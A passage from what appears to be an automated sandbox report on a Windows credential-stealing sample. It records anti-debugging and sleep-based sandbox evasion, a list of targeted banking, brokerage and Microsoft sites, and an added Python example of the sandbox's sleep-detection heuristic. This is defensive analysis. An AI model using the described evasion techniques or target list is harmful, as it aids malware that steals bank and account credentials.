                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E rdtsc
                Source: C:\Windows\SysWOW64\rasdial.exe Window / User API: threadDelayed 9840
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-102527
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe API coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 3052 Thread sleep count: 132 > 30
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 3052 Thread sleep time: -264000s >= -30000s
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 3052 Thread sleep count: 9840 > 30
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 3052 Thread sleep time: -19680000s >= -30000s
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe TID: 3496 Thread sleep time: -45000s >= -30000s
                Source: C:\Windows\SysWOW64\rasdial.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\rasdial.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0012445A GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0012C6D1 FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0012C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0012EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0012F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0012F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_001237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_00123B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0012BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_000C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
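The sleep rows above are the output of a simple per-thread heuristic: count the delay calls a thread makes and sum their durations, then compare against fixed thresholds (more than 30 calls, or a total of at least 30000 ms). The totals in the report divide evenly by the counts (264000 / 132 and 19680000 / 9840 are both 2000), so each call was a 2-second sleep, and the leading minus sign is the NT convention for a relative interval passed to NtDelayExecution rather than a negative duration. The block below is an added example of that aggregation, not Joe Sandbox code; the thresholds are taken from the report's own comparisons, the call records are constructed to match the TID 3052 and TID 3496 rows, and the process indices and the benign thread are made up for illustration.

```python
"""Sleep-based evasion heuristic over per-thread delay calls.

Added example, not Joe Sandbox code. Thresholds (30 calls, 30 000 ms) are
taken from the report's comparisons; the call records are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass

MAX_SLEEP_CALLS = 30          # "Thread sleep count: N > 30"
MAX_TOTAL_SLEEP_MS = 30_000   # "Thread sleep time: ... >= -30000"


def nt_interval_to_ms(interval: int) -> int:
    """Convert an NtDelayExecution interval (100 ns units) to milliseconds.

    A negative value marks the interval as relative, which is how Sleep(ms)
    reaches the kernel: Sleep(2000) becomes -20_000_000. Only the magnitude
    matters for the heuristic, so the sign is dropped.
    """
    return abs(interval) // 10_000


@dataclass(frozen=True)
class DelayCall:
    process: int    # constructed process label, not a real PID
    tid: int        # thread id as the report prints it
    interval: int   # raw NtDelayExecution value


def summarize(calls):
    """Per-(process, tid) call count and total milliseconds slept."""
    stats = defaultdict(lambda: {"count": 0, "total_ms": 0})
    for c in calls:
        key = (c.process, c.tid)
        stats[key]["count"] += 1
        stats[key]["total_ms"] += nt_interval_to_ms(c.interval)
    return dict(stats)


def flag_sleep_evasion(calls):
    """Apply both thresholds to every thread; a thread can trip one or both."""
    findings = []
    for (proc, tid), s in sorted(summarize(calls).items()):
        if s["count"] > MAX_SLEEP_CALLS:
            findings.append(f"process {proc} TID {tid}: sleep count {s['count']} > {MAX_SLEEP_CALLS}")
        if s["total_ms"] >= MAX_TOTAL_SLEEP_MS:
            findings.append(f"process {proc} TID {tid}: total sleep {s['total_ms']} ms >= {MAX_TOTAL_SLEEP_MS}")
    return findings


# Constructed calls: 132 x Sleep(2000) on TID 3052 (matches the 264000 total),
# one 45 s sleep on TID 3496, and a benign thread with five 10 ms waits.
SAMPLE_CALLS = (
    [DelayCall(7, 3052, -20_000_000)] * 132
    + [DelayCall(6, 3496, -450_000_000)]
    + [DelayCall(0, 1234, -100_000)] * 5
)

if __name__ == "__main__":
    for line in flag_sleep_evasion(SAMPLE_CALLS):
        print(line)
```

A single long sleep (TID 3496) trips only the total-time threshold, while a loop of short sleeps (TID 3052) trips both; tracking the two separately is what lets a sandbox distinguish "wait once and run" from "poll until the analysis window expires".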
                Source: a155F05G.7.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: a155F05G.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: a155F05G.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: a155F05G.7.dr Binary or memory string: discord.comVMware20,11696487552f
                Source: a155F05G.7.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: rasdial.exe, 00000007.00000002.3389284232.0000000007A54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: swordVMware20,11
                Source: a155F05G.7.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: a155F05G.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: a155F05G.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: a155F05G.7.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: a155F05G.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: a155F05G.7.dr Binary or memory string: global block list test formVMware20,11696487552
                Source: rasdial.exe, 00000007.00000002.3389284232.0000000007A54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n PasswordVMware]
                Source: rasdial.exe, 00000007.00000002.3389284232.0000000007A54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,116
                Source: rasdial.exe, 00000007.00000002.3389284232.0000000007A54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: omVMware20,11696
                Source: a155F05G.7.dr Binary or memory string: AMC password management pageVMware20,11696487552
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000002.3385317301.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2743821974.000002887FD0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: a155F05G.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: rasdial.exe, 00000007.00000002.3389284232.0000000007A54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs.co.inVMware20
                Source: a155F05G.7.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: a155F05G.7.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: a155F05G.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: a155F05G.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: a155F05G.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: a155F05G.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: a155F05G.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: a155F05G.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: a155F05G.7.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: a155F05G.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: a155F05G.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: a155F05G.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: a155F05G.7.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: a155F05G.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: a155F05G.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: a155F05G.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: a155F05G.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: a155F05G.7.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\rasdial.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E rdtsc
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417903 LdrLoadDll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_00133F09 BlockInput
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_000C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_000F5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_000C4B37 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_014CE880 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_014CFF10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_014CFEB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
